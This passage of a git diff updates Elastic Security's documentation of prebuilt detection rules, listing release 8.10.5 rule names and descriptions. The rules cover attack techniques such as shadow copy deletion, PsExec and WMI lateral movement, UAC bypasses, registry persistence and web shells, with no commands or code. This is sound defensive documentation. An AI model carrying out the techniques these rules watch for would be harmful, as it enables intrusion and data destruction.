has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. | update | 107 + +|<<prebuilt-rule-8-10-5-account-discovery-command-via-system-account, Account Discovery Command via SYSTEM Account>> | Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. | update | 107 + +|<<prebuilt-rule-8-10-5-powershell-share-enumeration-script, PowerShell Share Enumeration Script>> | Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. | update | 7 + +|<<prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions, PowerShell Suspicious Discovery Related Windows API Functions>> | This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. | update | 110 + +|<<prebuilt-rule-8-10-5-command-execution-via-solarwinds-process, Command Execution via SolarWinds Process>> | A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. | update | 107 + +|<<prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32, Command Shell Activity Started via RunDLL32>> | Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script, Suspicious Portable Executable Encoded in Powershell Script>> | Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. | update | 108 + +|<<prebuilt-rule-8-10-5-psexec-network-connection, PsExec Network Connection>> | Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. | update | 107 + +|<<prebuilt-rule-8-10-5-network-connection-via-registration-utility, Network Connection via Registration Utility>> | Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. | update | 106 + +|<<prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell, Outbound Scheduled Task Activity via PowerShell>> | Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi, Suspicious Cmd Execution via WMI>> | Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process, Suspicious PDF Reader Child Process>> | Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable, Suspicious Process Execution via Renamed PsExec Executable>> | Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. | update | 108 + +|<<prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process, Conhost Spawned By Suspicious Parent Process>> | Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. | update | 107 + +|<<prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process, Third-party Backup Files Deleted via Unexpected Process>> | Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. | update | 108 + +|<<prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin, Deleting Backup Catalogs with Wbadmin>> | Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. | update | 107 + +|<<prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell, Volume Shadow Copy Deletion via PowerShell>> | Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. | update | 107 + +|<<prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic, Volume Shadow Copy Deletion via WMIC>> | Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. | update | 107 + +|<<prebuilt-rule-8-10-5-windows-script-executing-powershell, Windows Script Executing PowerShell>> | Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. | update | 107 + +|<<prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi, Windows Script Interpreter Executing Process via WMI>> | Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. | update | 107 + +|<<prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files, Microsoft Exchange Server UM Writing Suspicious Files>> | Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858. | update | 105 + +|<<prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes, Microsoft Exchange Server UM Spawning Suspicious Processes>> | Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. | update | 105 + +|<<prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes, Microsoft Exchange Worker Spawning Suspicious Processes>> | Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-ms-office-child-process, Suspicious MS Office Child Process>> | Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process, Suspicious MS Outlook Child Process>> | Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. | update | 107 + +|<<prebuilt-rule-8-10-5-suspicious-explorer-child-process, Suspicious Explorer Child Process>> | Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. | update | 106 + +|<<prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc, Incoming DCOM Lateral Movement with MMC>> | Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. | update | 106 + +|<<prebuilt-rule-8-10-5-nullsessionpipe-registry-modification, NullSessionPipe Registry Modification>> | Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity, Potential Remote Desktop Shadowing Activity>> | Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share, Potential Lateral Tool Transfer via SMB Share>> | Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. | update | 107 + +|<<prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint, Execution via TSClient Mountpoint>> | Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. | update | 106 + +|<<prebuilt-rule-8-10-5-remote-execution-via-file-shares, Remote Execution via File Shares>> | Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. | update | 108 + +|<<prebuilt-rule-8-10-5-wmi-incoming-lateral-movement, WMI Incoming Lateral Movement>> | Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. | update | 108 + +|<<prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting, Incoming Execution via PowerShell Remoting>> | Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. | update | 107 + +|<<prebuilt-rule-8-10-5-rdp-enabled-via-registry, RDP Enabled via Registry>> | Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded, Suspicious RDP ActiveX Client Loaded>> | Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. | update | 105 + +|<<prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe, Unusual Child Process of dns.exe>> | Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. | update | 107 + +|<<prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe, Unusual File Modification by dns.exe>> | Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. | update | 107 + +|<<prebuilt-rule-8-10-5-lateral-movement-via-startup-folder, Lateral Movement via Startup Folder>> | Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. | update | 105 + +|<<prebuilt-rule-8-10-5-adminsdholder-backdoor, AdminSDHolder Backdoor>> | Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. | update | 106 + +|<<prebuilt-rule-8-10-5-adobe-hijack-persistence, Adobe Hijack Persistence>> | Detects writing executable files that will be automatically launched by Adobe on launch. | update | 108 + +|<<prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll, Registry Persistence via AppCert DLL>> | Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes. | update | 105 + +|<<prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll, Registry Persistence via AppInit DLL>> | AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. | update | 106 + +|<<prebuilt-rule-8-10-5-image-file-execution-options-injection, Image File Execution Options Injection>> | The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification, Suspicious Startup Shell Folder Modification>> | Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. | update | 108 + +|<<prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script, Scheduled Task Created by a Windows Script>> | A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. | update | 105 + +|<<prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins, Persistence via Microsoft Office AddIns>> | Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. | update | 105 + +|<<prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell, New ActiveSyncAllowedDeviceID Added via PowerShell>> | Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. | update | 106 + +|<<prebuilt-rule-8-10-5-persistence-via-powershell-profile, Persistence via PowerShell profile>> | Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. | update | 6 + +|<<prebuilt-rule-8-10-5-account-password-reset-remotely, Account Password Reset Remotely>> | Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. | update | 107 + +|<<prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added, AdminSDHolder SDProp Exclusion Added>> | Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. | update | 108 + +|<<prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost, Unsigned DLL Loaded by Svchost>> | Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges. | update | 5 + +|<<prebuilt-rule-8-10-5-unusual-persistence-via-services-registry, Unusual Persistence via Services Registry>> | Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. | update | 105 + +|<<prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process, Startup Folder Persistence via Unsigned Process>> | Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. | update | 108 + +|<<prebuilt-rule-8-10-5-component-object-model-hijacking, Component Object Model Hijacking>> | Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office, Suspicious Image Load (taskschd.dll) from MS Office>> | Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task, Suspicious Execution via Scheduled Task>> | Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-imagepath-service-creation, Suspicious ImagePath Service Creation>> | Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. | update | 105 + +|<<prebuilt-rule-8-10-5-system-shells-via-services, System Shells via Services>> | Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-temporarily-scheduled-task-creation, Temporarily Scheduled Task Creation>> | Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. | update | 7 + +|<<prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification, Potential Persistence via Time Provider Modification>> | Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. | update | 105 + +|<<prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected, Persistence via Hidden Run Key Detected>> | Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). | update | 105 + +|<<prebuilt-rule-8-10-5-installation-of-security-support-provider, Installation of Security Support Provider>> | Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. | update | 105 + +|<<prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack, Persistence via TelemetryController Scheduled Task Hijack>> | Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. | update | 106 + +|<<prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack, Persistence via Update Orchestrator Service Hijack>> | Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. | update | 108 + +|<<prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription, Persistence via WMI Event Subscription>> | An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. | update | 107 + +|<<prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure, Execution via MSSQL xp_cmdshell Stored Procedure>> | Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. | update | 107 + +|<<prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes, Web Shell Detection: Script Process Child of Common Web Processes>> | Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. | update | 107 + +|<<prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials, Modification of the msPKIAccountCredentials>> | Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. | update | 7 + +|<<prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification, Disabling User Account Control via Registry Modification>> | User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. | update | 107 + +|<<prebuilt-rule-8-10-5-first-time-seen-driver-loaded, First Time Seen Driver Loaded>> | Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. | update | 6 + +|<<prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service, Creation or Modification of a new GPO Scheduled Task or Service>> | Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. | update | 106 + +|<<prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo, Scheduled Task Execution at Scale via GPO>> | Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover, Potential Privilege Escalation via InstallerFileTakeOver>> | Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation, Suspicious DLL Loaded for Persistence or Privilege Escalation>> | Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse, Potential Port Monitor or Print Processor Registration Abuse>> | Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. | update | 105 + +|<<prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing, Potential Privileged Escalation via SamAccountName Spoofing>> | Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. | update | 106 + +|<<prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter, Service Control Spawned via Script Interpreter>> | Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. | update | 107 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface, UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface>> | Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer, UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer>> | Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface, UAC Bypass via ICMLuaUtil Elevated COM Interface>> | Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack, UAC Bypass via DiskCleanup Scheduled Task Hijack>> | Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. | update | 105 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface, UAC Bypass Attempt via Privileged IFileOperation COM Interface>> | Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-bypass-uac-via-event-viewer, Bypass UAC via Event Viewer>> | Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading, UAC Bypass Attempt via Windows Directory Masquerading>> | Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack, UAC Bypass via Windows Firewall Snap-In Hijack>> | Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service, Unusual Service Host Child Process - Childless Service>> | Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation. | update | 106 + +|============================================== diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc index 7aaebdde3c..6a72354716 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc @@ -1250,8 +1250,6 @@ information about a rule's changes, see the rule's description page. <<potential-credential-access-via-trusted-developer-utility>> -<<potential-dll-sideloading-via-trusted-microsoft-programs>> - <<potential-evasion-via-filter-manager>> <<process-activity-via-compiled-html-file>> @@ -1546,8 +1544,6 @@ information about a rule's changes, see the rule's description page. <<potential-credential-access-via-trusted-developer-utility>> -<<potential-dll-sideloading-via-trusted-microsoft-programs>> - <<potential-modification-of-accessibility-binaries>> <<potential-secure-file-deletion-via-sdelete-utility>> diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc index 28ac360395..8c9f3b5b97 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc @@ -13,6 +13,15 @@ For previous rule updates, please navigate to the https://www.elastic.co/guide/e |Update version |Date | New rules | Updated rules | Notes +|<<prebuilt-rule-8-10-5-prebuilt-rules-8-10-5-summary, 8.10.5>> | 24 Oct 2023 | 28 | 279 | +This release includes new rules for Windows and Linux. +New rules for Windows include detection for image loading with invalid signatures. +Linux rules include additional detection for suspicious Unix socket connections, privilege esvalation via cap_setuid and reverse shells. +Several build block rules have been added for Linux and Windows regarding user entity behavior. +Machine learning rules for Domain Generation Algorithms (DGA) and Lateral Movement Detection (LMD) analytic packages have been moved to prebuilt rules. +Machine learning rules for Living-off-the-Land (LotL) Detection, and Data Exfiltration Detection (DED) analytic packages have been migrated to the prebuilt rules as well. +Additionally, lucene queries using boolean logic have been updated to use uppercase operators. + |<<prebuilt-rule-8-10-4-prebuilt-rules-8-10-4-summary, 8.10.4>> | 14 Oct 2023 | 21 | 56 | This release includes new rules for GitHub, Windows and Linux. New rules for GitHub include detection for organization wide applications and new repository owners. @@ -47,3 +56,4 @@ include::downloadable-packages/8-10-1/prebuilt-rules-8-10-1-summary.asciidoc[lev include::downloadable-packages/8-10-2/prebuilt-rules-8-10-2-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-10-3/prebuilt-rules-8-10-3-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-10-4/prebuilt-rules-8-10-4-summary.asciidoc[leveloffset=+1] +include::downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc[leveloffset=+1] diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc index 1a358b8b8b..3c0710ce6f 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc @@ -18,117 +18,117 @@ and their rule type is `machine_learning`. |<<a-scheduled-task-was-updated, A scheduled task was updated>> |Indicates the update of a scheduled task using Windows event logs. Adversaries can use these to establish persistence, by changing the configuration of a legit scheduled task. Some changes such as disabling or enabling a scheduled task are common and may may generate noise. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |8 -|<<aws-cloudtrail-log-created, AWS CloudTrail Log Created>> |Identifies the creation of an AWS log trail that specifies the settings for delivery of log data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Collection] |8.3.0 |105 +|<<aws-cloudtrail-log-created, AWS CloudTrail Log Created>> |Identifies the creation of an AWS log trail that specifies the settings for delivery of log data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Collection] |8.9.0 |206 -|<<aws-cloudtrail-log-deleted, AWS CloudTrail Log Deleted>> |Identifies the deletion of an AWS log trail. An adversary may delete trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-cloudtrail-log-deleted, AWS CloudTrail Log Deleted>> |Identifies the deletion of an AWS log trail. An adversary may delete trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-cloudtrail-log-suspended, AWS CloudTrail Log Suspended>> |Identifies suspending the recording of AWS API calls and log file delivery for the specified trail. An adversary may suspend trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-cloudtrail-log-suspended, AWS CloudTrail Log Suspended>> |Identifies suspending the recording of AWS API calls and log file delivery for the specified trail. An adversary may suspend trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-cloudtrail-log-updated, AWS CloudTrail Log Updated>> |Identifies an update to an AWS log trail setting that specifies the delivery of log files. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.3.0 |107 +|<<aws-cloudtrail-log-updated, AWS CloudTrail Log Updated>> |Identifies an update to an AWS log trail setting that specifies the delivery of log files. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.9.0 |208 -|<<aws-cloudwatch-alarm-deletion, AWS CloudWatch Alarm Deletion>> |Identifies the deletion of an AWS CloudWatch alarm. An adversary may delete alarms in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-cloudwatch-alarm-deletion, AWS CloudWatch Alarm Deletion>> |Identifies the deletion of an AWS CloudWatch alarm. An adversary may delete alarms in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-cloudwatch-log-group-deletion, AWS CloudWatch Log Group Deletion>> |Identifies the deletion of a specified AWS CloudWatch log group. When a log group is deleted, all the archived log events associated with the log group are also permanently deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], 